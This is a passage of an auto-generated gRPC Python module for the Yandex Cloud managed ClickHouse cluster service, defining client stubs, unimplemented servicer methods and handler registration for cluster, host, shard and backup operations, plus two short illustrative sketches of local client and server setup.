response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterBackupsResponse.FromString,
)
self.ListHosts = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListHosts',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterHostsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterHostsResponse.FromString,
)
self.AddHosts = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/AddHosts',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterHostsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.UpdateHosts = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/UpdateHosts',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterHostsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.DeleteHosts = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteHosts',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterHostsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.GetShard = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/GetShard',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterShardRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.Shard.FromString,
)
self.ListShards = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListShards',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardsResponse.FromString,
)
self.AddShard = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/AddShard',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterShardRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.UpdateShard = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/UpdateShard',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterShardRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.DeleteShard = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteShard',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterShardRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.GetShardGroup = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/GetShardGroup',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterShardGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.ShardGroup.FromString,
)
self.ListShardGroups = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListShardGroups',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardGroupsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardGroupsResponse.FromString,
)
self.CreateShardGroup = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/CreateShardGroup',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterShardGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.UpdateShardGroup = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/UpdateShardGroup',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterShardGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.DeleteShardGroup = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteShardGroup',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterShardGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.CreateExternalDictionary = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/CreateExternalDictionary',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterExternalDictionaryRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.DeleteExternalDictionary = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteExternalDictionary',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterExternalDictionaryRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
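# --- Illustrative client usage (a sketch, not generated code) ---
# Minimal example of driving the stub registered above. It assumes the
# ClusterServiceStub class defined earlier in this module; the endpoint and
# the cluster_id field below are hypothetical placeholders, and real Yandex
# Cloud calls also need TLS credentials plus an auth token in call metadata.
def _example_list_hosts(cluster_id):
    """Sketch: list the hosts of one cluster through the generated stub."""
    import grpc
    channel = grpc.insecure_channel('localhost:50051')  # hypothetical endpoint
    stub = ClusterServiceStub(channel)
    request = yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterHostsRequest(
        cluster_id=cluster_id)
    # Unary-unary RPC: returns a single ListClusterHostsResponse message.
    return stub.ListHosts(request)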
class ClusterServiceServicer(object):
"""A set of methods for managing ClickHouse clusters.
"""
def Get(self, request, context):
"""Returns the specified ClickHouse cluster.
To get the list of available ClickHouse clusters, make a [List] request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def List(self, request, context):
"""Retrieves a list of ClickHouse clusters that belong
to the specified folder.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Create(self, request, context):
"""Creates a ClickHouse cluster in the specified folder.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Update(self, request, context):
"""Updates the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Delete(self, request, context):
"""Deletes the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Start(self, request, context):
"""Starts the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stop(self, request, context):
"""Stops the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Move(self, request, context):
"""Moves a ClickHouse cluster to the specified folder.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def AddZookeeper(self, request, context):
"""Adds a ZooKeeper subcluster to the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Backup(self, request, context):
"""Creates a backup for the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Restore(self, request, context):
"""Creates a new ClickHouse cluster using the specified backup.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def RescheduleMaintenance(self, request, context):
"""Reschedules planned maintenance operation.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListLogs(self, request, context):
"""Retrieves logs for the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def StreamLogs(self, request, context):
"""Same as ListLogs but using server-side streaming. Also allows for `tail -f` semantics.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListOperations(self, request, context):
"""Retrieves the list of Operation resources for the specified cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListBackups(self, request, context):
"""Retrieves the list of available backups for the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListHosts(self, request, context):
"""Retrieves a list of hosts for the specified cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def AddHosts(self, request, context):
"""Creates new hosts for a cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateHosts(self, request, context):
"""Updates the specified hosts.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteHosts(self, request, context):
"""Deletes the specified hosts for a cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetShard(self, request, context):
"""Returns the specified shard.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListShards(self, request, context):
"""Retrieves a list of shards that belong to the specified cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def AddShard(self, request, context):
"""Creates a new shard in the specified cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateShard(self, request, context):
"""Modifies the specified shard.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteShard(self, request, context):
"""Deletes the specified shard.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetShardGroup(self, request, context):
"""Returns the specified shard group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListShardGroups(self, request, context):
"""Retrieves a list of shard groups that belong to specified cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateShardGroup(self, request, context):
"""Creates a new shard group in the specified cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateShardGroup(self, request, context):
"""Updates the specified shard group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteShardGroup(self, request, context):
"""Deletes the specified shard group.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateExternalDictionary(self, request, context):
"""Creates an external dictionary for the specified ClickHouse cluster.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteExternalDictionary(self, request, context):
"""Deletes the specified external dictionary.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ClusterServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Get': grpc.unary_unary_rpc_method_handler(
servicer.Get,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.Cluster.SerializeToString,
),
'List': grpc.unary_unary_rpc_method_handler(
servicer.List,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClustersRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClustersResponse.SerializeToString,
),
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Update': grpc.unary_unary_rpc_method_handler(
servicer.Update,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Delete': grpc.unary_unary_rpc_method_handler(
servicer.Delete,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Start': grpc.unary_unary_rpc_method_handler(
servicer.Start,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StartClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Stop': grpc.unary_unary_rpc_method_handler(
servicer.Stop,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StopClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Move': grpc.unary_unary_rpc_method_handler(
servicer.Move,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.MoveClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'AddZookeeper': grpc.unary_unary_rpc_method_handler(
servicer.AddZookeeper,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterZookeeperRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Backup': grpc.unary_unary_rpc_method_handler(
servicer.Backup,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.BackupClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Restore': grpc.unary_unary_rpc_method_handler(
servicer.Restore,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.RestoreClusterRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'RescheduleMaintenance': grpc.unary_unary_rpc_method_handler(
servicer.RescheduleMaintenance,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.RescheduleMaintenanceRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'ListLogs': grpc.unary_unary_rpc_method_handler(
servicer.ListLogs,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterLogsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterLogsResponse.SerializeToString,
),
'StreamLogs': grpc.unary_stream_rpc_method_handler(
servicer.StreamLogs,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StreamClusterLogsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StreamLogRecord.SerializeToString,
),
'ListOperations': grpc.unary_unary_rpc_method_handler(
servicer.ListOperations,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterOperationsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterOperationsResponse.SerializeToString,
),
'ListBackups': grpc.unary_unary_rpc_method_handler(
servicer.ListBackups,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterBackupsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterBackupsResponse.SerializeToString,
),
'ListHosts': grpc.unary_unary_rpc_method_handler(
servicer.ListHosts,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterHostsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterHostsResponse.SerializeToString,
),
'AddHosts': grpc.unary_unary_rpc_method_handler(
servicer.AddHosts,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterHostsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'UpdateHosts': grpc.unary_unary_rpc_method_handler(
servicer.UpdateHosts,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterHostsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'DeleteHosts': grpc.unary_unary_rpc_method_handler(
servicer.DeleteHosts,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterHostsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'GetShard': grpc.unary_unary_rpc_method_handler(
servicer.GetShard,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterShardRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.Shard.SerializeToString,
),
'ListShards': grpc.unary_unary_rpc_method_handler(
servicer.ListShards,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardsResponse.SerializeToString,
),
'AddShard': grpc.unary_unary_rpc_method_handler(
servicer.AddShard,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterShardRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'UpdateShard': grpc.unary_unary_rpc_method_handler(
servicer.UpdateShard,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterShardRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'DeleteShard': grpc.unary_unary_rpc_method_handler(
servicer.DeleteShard,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterShardRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'GetShardGroup': grpc.unary_unary_rpc_method_handler(
servicer.GetShardGroup,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterShardGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.ShardGroup.SerializeToString,
),
'ListShardGroups': grpc.unary_unary_rpc_method_handler(
servicer.ListShardGroups,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardGroupsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardGroupsResponse.SerializeToString,
),
'CreateShardGroup': grpc.unary_unary_rpc_method_handler(
servicer.CreateShardGroup,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterShardGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'UpdateShardGroup': grpc.unary_unary_rpc_method_handler(
servicer.UpdateShardGroup,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterShardGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'DeleteShardGroup': grpc.unary_unary_rpc_method_handler(
servicer.DeleteShardGroup,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterShardGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'CreateExternalDictionary': grpc.unary_unary_rpc_method_handler(
servicer.CreateExternalDictionary,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterExternalDictionaryRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'DeleteExternalDictionary': grpc.unary_unary_rpc_method_handler(
servicer.DeleteExternalDictionary,
request_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterExternalDictionaryRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'yandex.cloud.mdb.clickhouse.v1.ClusterService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
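# --- Illustrative server wiring (a sketch, not generated code) ---
# Minimal example of how the helper above is typically used: implement the
# methods on a ClusterServiceServicer subclass, then attach an instance to a
# grpc.server. The port and worker count below are illustrative only.
def _example_serve(servicer):
    """Sketch: serve a servicer implementation on a local insecure port."""
    from concurrent import futures
    import grpc
    server = grpc.server(futures.ThreadPoolExecutor(max_workers=4))
    add_ClusterServiceServicer_to_server(servicer, server)
    server.add_insecure_port('[::]:50051')  # hypothetical local port
    server.start()
    server.wait_for_termination()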
# This class is part of an EXPERIMENTAL API.
class ClusterService(object):
"""A set of methods for managing ClickHouse clusters.
"""
@staticmethod
def Get(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Get',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.Cluster.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def List(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/List',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClustersRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClustersResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Create(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Create',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Update(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Update',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Delete(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Delete',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Start(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Start',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StartClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Stop(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Stop',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StopClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Move(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Move',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.MoveClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def AddZookeeper(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/AddZookeeper',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterZookeeperRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Backup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Backup',
